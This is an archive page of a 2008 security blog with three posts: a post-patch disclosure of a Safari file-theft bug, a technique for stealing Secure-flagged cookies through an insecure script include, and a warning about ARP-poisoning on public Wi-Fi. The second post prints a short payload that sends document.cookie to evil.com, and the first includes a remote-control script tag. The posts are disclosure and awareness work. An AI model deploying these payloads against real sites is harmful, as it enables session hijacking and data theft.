Archive for the 'Security' Category
Wednesday, November 19th, 2008
Stealing Files with Safari
Apple recently patched a vulnerability Nitesh “Leisure Suit” Dhanjani and I reported to them last week (CVE-2008-4216). We had reported a similar vulnerability to Apple about two months ago (CVE-2008-3638). In fact, the exploitation technique was so similar we held off releasing details until this 2nd patch was released.
The basic gist of this vulnerability pits a browser and a browser plug-in against each other in order to cross a subtle, but important boundary. The issue starts simply enough with a victim visiting an attackers webpage. Once on the attacker’s webpage, the attacker simply loads a Java Applet. Inside of the applet is a call to getAppletContext().showDocument(URL);
getAppletContext().showDocument(URL) basically has the browser open a new browser window with the URL passed to showDocument(). Normally, browsers will not let remote sites open new browser windows which point to local files. It seemed that Safari had some issues determining the specific “rights” for windows opened via Java Applets and allowed getAppletContext().showDocument() to force the browser to open a file from the user’s local file system.
Now here is where things get interesting… Opening a local file in the browser isn’t very useful unless we can open and render/execute content that we control. There are a couple ways plant our content in a predictable location using Safari. Safari, by default has a reasonably predictable location for cached/temporary files. We can use these predictable locations to load our content, we’ll have some guessing to do, but it works… Safari can also be forced to dump user controlled contents to the “c:\temp” directory (in Windows, of course), which makes thing far more predictable making the attack a lot less noisy. I’m not sure if Apple considers the “c:\temp” issue a bug, but just in case they do I won’t go over the details for the “c:\temp” trick just yet.
In case you’re wondering, Internet Explorer and FireFox use a random, 8 character directory name to prevent guessing of temporary file locations.
Once we’ve planted our contents to a predictable location, it’s now simply a matter of having the Java Applet call the file we’ve planted. We have unlimited guesses to get the location and file name right, but the more guesses the more noisy the attack (obviously). The file we’ve planted is an HTML file which loads an XMLHTTP object, which is used to steal files from the local file system. You can include a <script src=”http://attacker-server/remote-control.js></script> if you want to remotely control the script running on the local file system. Safari allows script to be executed from local files without warning, so once we get the right location and filename for our planted HTML file, files can be stolen off the local file system without user interaction or warnings.
Internet Explorer presents a warning before executing script from local files and FireFox (as of FireFox3) restricts XMLHTTP loaded from the local file system to the directory the html file was loaded from (and any subdirectories).
Once we have the contents of the file in JavaScript space, we simple encode the contents and POST the contents to our attacker web server. There you go… Stealing Files with Safari!
Wednesday, September 24th, 2008
Surf Jacking Secure Cookies
I was thinking back to Sandro’s paper on Surf Jacking and I realized that there was one small caveat where the “Secure” flag wouldn’t protect your cookies from Surf Jacking…
The Side Jacking and Surf Jacking techniques basically stipulate that the attacker has to be on the same network segment as the victim (you have to be able to sniff the traffic in order to see the cookie go by on the network)… So I’ll stipulate the same.
Say I go to https://xs-sniper.com and xs-sniper.com sets a cookie, but sets it with the “Secure” flag. An attacker could eventually force my browser to load a non-secure version of xs-sniper.com (http://xs-sniper.com) in an attempt to force my session cookie to travel in the clear so they can sniff the cookie as it goes by (this is a simplified description of Surf Jacking). Now, if all my cookies are set secure, my cookies won’t travel over the wire in the clear… I’m safe… right?
Not so fast… If application sets all the cookies with the secure flag, BUT the web application also has a “script src” tag pointing to an insecure location (http://) then you can STILL STEAL THE COOKIE, even if its marked secure. Let me explain…
If an attacker is on the same network segment as you, not only can they sniff clear text data (http://) they can also INJECT data as it traverses the network. Let’s say I have a page on xs-sniper.com that does analytics for my web application. We’ll name this page http://xs-sniper.com/analytics.html. This page is meant to be served as http:// and contains no sensitive data, but if a user makes a direct request for https://xs-sniper.com/analytics.html the page is still served. Inside of the page’s HTML is a script src tag that looks something like this:
<script src=”http://myanalytics.com/webbugs.js”></script>
Now, using the surf jack technique, Sandro redirected the victim to an http:// version of the targeted site. In our case, redirecting to an insecure version of the site doesn’t help us as all the cookies are set SECURE. Instead, we’ll redirect to an https:// page on our victim domain that contains an insecure script src tag like the one shown above (https://xs-sniper.com/analytics.html). Once we see the request for the insecure javascript file (webbugs.js) file, we can inject our own javascript cookie stealing payload (as the script src request is made in the clear):
CookiesStealer = new Image();
CookiesStealer.src = “http://www.evil.com/stealer.jpg?”+document.cookie;
The injected script is executed by the page that loaded it and gives up the cookies for the domain, even if they are marked secure. There you go… Secure cookies stolen.
Without warning or prompt, every browser I tested allowed an https:// page to load a script src from an insecure http:// location. Ok… I lied… every browser EXCEPT ONE… can you guess which lonely browser provided a warning before allowing an https:// page to load a script from an http:// location? You can find the answer here. For those of you in disbelief, you can test your favorite browser(s) here.
SIDENOTE: HTTP pages that call document.cookie will NOT have access to SECURE cookies… well at least in the browsers that I checked… that’s pretty cool…
CLARIFICATION ON SIDENOTE: From my tests (which only covered a few browsers) it seems that the document.cookie object called from an http:// page WILL NOT contain secure cookies (this is a GOOD thing). So, if I were able to inject a full http:// page and called document.cookie, the secure cookie would be missing. This is why I needed to call an https:// page with a script src that loaded an insecure script file.
Monday, September 15th, 2008
Hostile Hotel Networks?!?!
Dark Reading recently had an interesting article related to the security of Hotel networks; you can find the article I’m talking about here.
As I read the article… I couldn’t help but smile… the article made it seem like Hotels have horribly insecure networks! The truth is, THEY DO…along with airports, coffee shops, bookstores and pretty much ANY PLACE that offers up connectivity!
Some people fail to understand that when you join ANY network, you’re trusting that everyone on the network is playing nicely. Many of the protocols that enable our network connectivity WERE NOT DESIGNED TO SECURELY SUPPORT THE SCENARIOS WE DEMAND TODAY. Take for example, Address Resolution Protocol (ARP). ARP is the one protocol that really makes me paranoid. The details of how ARP works and how it can be used to do evil is way beyond the scope of this post, but you find some good information here, here, and here.
The ARP abuses I’m most interested in are ARP Poisoning attacks. These attacks basically allow me to Man-in-the-Middle (MITM) network connections, typically from a victim’s machine to their gateway. Now ARP poisoning attacks have one MAJOR drawback (from an attacker standpoint), they typically require the victim to be on the same network as the attacker (in layman’s terms). Ask yourself this question…. why would I ever join an un-trusted network and possibly subject myself to such attacks?
Surprisingly, people join un-trusted networks all time. If you’ve ever associated to a wireless access point at a coffee shop, hotel, bookstore, or an airport…. you’ve joined an un-trusted network… IT’S THAT SIMPLE. Just because the SSID and the welcome page has a familiar name/logo that you trust, THAT DOESNT MEAN THAT YOU CAN TRUST EVERYONE ELSE CONNECTED TO THAT NETWORK, and if you can’t trust everyone connected to the network, then you’ve got yourself an un-trusted network. Now, MITM on “secure” connections (SSL aka HTTPS) usually causes a warning to appear (every major browser has this protection mechanism in place), and while I haven’t seen any studies on click through rate, I would guess that it’s pretty high.
Airports are a PRIME target for MITM, as they are typically filled with people using the available wireless access points to do business. Many of these people are not technically savvy and more importantly, THEY ARE IN A HURRY, which brings them to push past warning message after warning message in order to “get this out before my plane leaves!” If someone wanted to harvest a TON of sensitive information (creds to banking accounts, usernames, passwords, emails… everything you can possibly imagine), all they would have to do is connect to the airport wireless network, ARP poison every host they see… and let the creds roll in. It’s that simple… trust me… I’ve seen it firsthand… I can guarantee that you’ll have someone’s creds within 5 minutes…
Security pros will argue, “you can use a VPN” and they are right. If you are a corporate user, you shouldn’t even THINK about sending anything through an external, un-trusted network unless it’s through the VPN… but what about the home user? What about mom and pop, traveling on vacation… where is their VPN? Judging from the success of these attacks, even if a stern warning is presented, many users just ignore the warnings and continue on their merry way. Scores of software will silently ignore certificate warnings, happily passing information onto a suspect host. Besides, those warnings are only displayed when encryption is in play, so that unsuspecting user that is browsing their webmail over HTTP gets their session stolen without warning. It’s truly amazing how noisy our computers have become, spitting out all sorts of info… trusting that everyone else on the network is playing nicely.
Let’s say you understand the risks of MITM and you have to email something out before your plane leaves. You attempt to connect to your VPN server and you see a certificate warning. You suspect that someone may have an MITM against you using ARP Poisoning… what can you do to protect yourself and still get the email out?